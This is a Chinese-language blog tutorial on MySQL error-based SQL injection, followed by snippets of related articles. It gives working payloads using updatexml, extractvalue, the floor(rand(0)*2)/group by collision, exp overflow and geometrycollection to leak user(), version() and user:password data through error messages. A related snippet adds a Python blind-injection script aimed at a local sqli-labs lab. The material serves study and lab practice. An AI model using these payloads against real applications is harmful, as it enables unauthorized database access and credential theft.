sql注入基础-mysql报错注入

最新推荐文章于 2024-08-27 10:28:58 发布
原创 最新推荐文章于 2024-08-27 10:28:58 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #网络安全 #web安全 #渗透测试

mysql报错注入

原理

当联合注入无法回显时,可以利用报错回显,同时查询指令或者SQL函数会被执行,报错的过程可能会出现在查询或者插入甚至删除的过程中。

条件:

查询语句会被执行
报错信息有回显

常用函数

updatexml()

updatexml(目标xml内容,xml文档路径,更新的内容)

当参数2xml文档路径包含字符~,会判断不合法,输出字符~报错

利用concat函数将子查询语句与字符~拼接

例如:
select * from xxx where id=1 and updatexml(1,concat(0x7e,子查询语句),1)

extractvalue()

原理与updatexml基本一致,extractvalue少了一个new_xml(更新的内容)参数

例如:
select * from xxx where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

count()、floor、rand()、group by

count()函数用于统计表中记录,返回匹配条件的行数;
floor()函数返回小于等于参数值的最大整数;
rand()函数返回[0,1)之间的随机数;
group by函数将查询结果进行分组。
这四个函数的组合可以构造报错回显。

限制是表中必须至少有3条数据,8.x>mysql>5.0

如下例子1:

select count(*),floor(rand(0)*2) a from passwd group by a

passwd表中有6条数据

①floor(rand(0)*2)
rand()函数产生0到1的随机数
当设置参数为0时,rand(0)产生伪随机数,即数值是固定的
select rand(0) from passwd会产生固定的6条数据值
在这里插入图片描述
通过floor(rand(0)*2)取整,可以巧妙地将这6条数据变为011011的数据序列

②floor(rand(0)2) a
即将查询字段重命名为a
在这里插入图片描述
③select count(),floor(rand(0)*2) a from passwd group by a
大体意思就是从passwd表中以floor(rand(0)*2)字段值(命名为 a字段)为种类,对出现的种类用count函数进行计数统计。

④很正常的一条统计语句,关键在于group by的处理机制
由于随机函数rand(0)和常规数值不同,group by在处理时会建立虚拟表,类似于缓存,在查询时先执行随机函数再插入到虚拟表中,这就造成写入和插入一条记录时,rand(0)会被各执行一次。

⑤问题出在写入第三条记录时,会造成主键冲突,即③中提到的‘种类’一词,具体过程参考大佬文章
在这里插入图片描述
执行例子1,可以看到报错:group_key字段值‘1’重复写入
在这里插入图片描述
所以报错回显点在**floor(rand(0)*2)**参数处
利用之前提到的concat函数执行子查询,令查询结果和主键冲突报错一起回显
如下例子2:

select count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2)) a from passwd group by a

0x3a即用:分隔一下回显结果
在这里插入图片描述
为了保险起见,可以利用information_schema库中的表,避免出现记录少于三条不报错的情况。

不太常用函数

exp

exp(x)返回 e 的 x 次方,当数据过大溢出时报错,即 x > 709
payload:

exp(~(select * from (select (concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from xxx),0x7e))) as a))

geometrycollection

适用mysql5.5
geometrycollection用于构建空间几何对象,通过将参数设为字符串造成报错,类似的还有multipoint
函数参数形式:

geometrycollection(piont(10 10), point(30 30), linestring(15 15, 20 20))
payload:

geometrycollection((select * from(select * from(select version())a)b))

multipoint((select * from(select * from(select version())a)b))

……
还有很多可以构造报错注入的函数,参考大佬文章

24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1663
改变文档中符合条件的节点,使用不同的 XML 标记匹配和替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段和 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
墨者学院之SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 1061
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
sql注入报错注入
m0_63436163的博客
08-27 1507
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL注入报错注入
qq_68163788的博客
01-27 3566
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
sql注入-报错注入
课嗨教育的专栏
04-29 880
渗透测试基础-课程进度_不死的小鱼的博客-优快云博客 1.什么是报错注入 mysql_error 2.我们在什么情况下使用报错注入 在页面返回连错错误信息的时候 3.函数 updatexml //5.1版本以上使用 extrachvalue floor //5.0版本之前也可以使用 请求:http://localhost/Less-1/index.php?id=1%27 // %27是英文单引号的url编码,是被浏览器自动编码的 %20 是空格 返回:1' LIMIT 0,1 htt...
Mysql报错注入原理分析(count()、rand()、group by)
weixin_30483495的博客
04-20 241
Mysql报错注入原理分析(count()、rand()、group by) 0x00 疑问 一直在用mysql数据库报错注入方法,但为何会报错? 百度谷歌知乎了一番,发现大家都是把官网的结论发一下截图,然后执行sql证明一下结论,但是没有人去深入研究为什么rand不能和order by一起使用,也没彻底说明三者同时使用报错的原理。 0x01 位置问题? sele...
sql注入报错注入
2401_82760239的博客
04-02 2108
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入-04】报错注入案例
m0_64378913的博客
04-26 1797
目录1 报错注入概述2 常用的报错注入命令2.2 group by重复键冲突(count()+floor()+rand()+group by组合)2.2.1 group by重复键冲突的原理及bug演示2.2.2 补充:sql解析过程2.3 XPATH报错2.3.1 extractvalue()函数2.3.2 updatexml()函数2.4 测试失败的命令3 报错注入案例3.1 操作环境3.2 获取敏感信息3.2.1 获取数据库名3.2.2 获取表名3.2.3 获取字段名3.2.4 获取字段内
sqli-labs-基于报错注入
zlloveyouforever的博客
04-30 3032
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sql注入靶场sqli-labs常见sql注入漏洞详解
网安小菜鸡的博客
08-05 1049
把表里面每一行的结果拼成一个字符串输出(
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 188
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
MySQL报错注入
yuan_boss的博客
08-23 2602
触发报错的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL报错信息,会显示在页面中,因此可以利用报错信息进行注入
mysql报错注入原理,MySQL报错注入
weixin_42416926的博客
03-24 468
什么是报错注入SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果可以出现在错误信息中。我一位好友的博客写过一个SQL注入的专栏,除了报错注入以外,别的类型也写了,而且比较详细,我个人比较推荐阅读。数据溢出报错在某些版本中,可以通过exp函数的特性结合整数溢出的报错进行注入,比如这样select (select(!x-~0)from(select(select user())x...
mysql报错型手工注入_mysql手工注入
weixin_33526828的博客
02-28 342
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号......实战access手工注入(通用的方法) “显示友好的HTTP错误信息”前面的钩,...Mysql 报错注入 SQL 注入获取数据库数据,利用的方法可以大致分为联合查询、报错、布尔盲注 以及延时注入, ...
mysql中文注入_SQL注入Mysql报错注入
weixin_33923059的博客
01-31 198
——志向和热爱是伟大行为的双翼。昨天偷懒了没学什么东西,先自我反省一下 - -。今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中遇到的web100。当时懵逼状态,被学长提醒了一下才知道是Mysql报错注入,因为之前一直都没接触过,所以当时只是知道怎么用然后拿了flag。其实根本不知道什么原理怎么回事,直到今天才把一些常见的报错注入...
新型mysql报错注入
xiaoshan812613234的专栏
08-12 1336
新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出: 1.查询数据库版本: select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version
Sql注入-报错注入
WolvenSec的博客
06-06 2444
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql 报错注入
travelnight的博客
03-15 4423
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL注入-报错注入
qq_65240014的博客
08-08 987
本文主要介绍一种结合burpsuite的报错注入sql注入方法
SQLI-LABS报错注入
最新发布
04-02
### SQLI-LABS 报错注入解决方案教程 #### 背景介绍 SQL 注入是一种常见的安全漏洞,攻击者通过输入恶意的 SQL 查询语来获取敏感信息或破坏数据库。在 `sqli-labs` 靶场中,报错注入是一个重要的学习模块。它利用了某些函数或语法特性,在执行过程中触发错误消息,并从中提取有用的信息。 以下是针对 `sqli-labs` 报错注入的具体方法和技巧: --- #### 使用特定函数触发错误 MySQL 提供了一些内置函数,这些函数可以在查询失败时返回详细的错误信息。常用的有以下几个: - **`extractvalue()`**: 可用于从 XML 数据中提取值。如果指定的节点不存在,则会抛出异常。 - **`updatexml()`**: 类似于 `extractvalue()`,但它主要用于更新 XML 文档中的值。 - **`floor()` 和随机数组合**: 利用浮点运算引发除零错误或其他计算错误。 例如,可以通过以下方式构造查询字符串[^2]: ```sql ?id=1' || extractvalue(1,concat(0x3a,(select database()))) --+ ``` 上述语的作用是从目标数据库中提取当前使用的数据库名称。 --- #### 结合联合查询与条件判断 为了进一步验证是否存在注入点以及如何绕过过滤器,可以尝试使用布尔盲注的方式逐步缩小范围。比如,假设需要猜测第 i 位字符是否为某个具体字母 a-z 或 A-Z,可采用如下形式[^3]: ```sql ?id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security'),i,1))>ascii_value -- ``` 这里的关键在于调整变量 `i` 来定位不同的位置,并比较其对应的 ASCII 值大小关系。 --- #### 自动化工具辅助分析 手动测试虽然有助于理解原理,但在实际场景下效率较低。因此推荐借助一些自动化脚本或者开源项目完成批量探测工作。Burp Suite Pro 版本自带 Intruder 功能非常适合此类任务;另外还有专门设计用来处理 Web 应用程序安全性评估工作的 OWASP ZAP 工具可供选择。 对于初学者来说,也可以编写简单的 Python 脚本来实现基本功能。下面给出一段示范代码片段作为参考[^4]: ```python import requests url = "http://localhost/sqli-labs/Less-5/?id=" payload_template = "' OR (SELECT ASCII(SUBSTR(({query}),{pos},1)))={char}-- " characters = range(32, 127) def get_char(pos): for char in characters: payload = url + payload_template.format(query="database()", pos=pos, char=char) response = requests.get(payload).text if "You are in" in response: return chr(char), True return None, False result = "" for position in range(1, 9): # Assuming DB name length is known to be 8 chars. next_character, success = get_char(position) if not success: break result += str(next_character) print(f"The extracted db name is {result}") ``` 此脚本实现了基于时间延迟反馈机制下的单字节恢复过程演示效果。 --- #### 注意事项 尽管以上技术能够有效帮助学员掌握核心概念,但仍需注意合法合规前提下方能实践演练。切勿非法入侵他人系统! ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值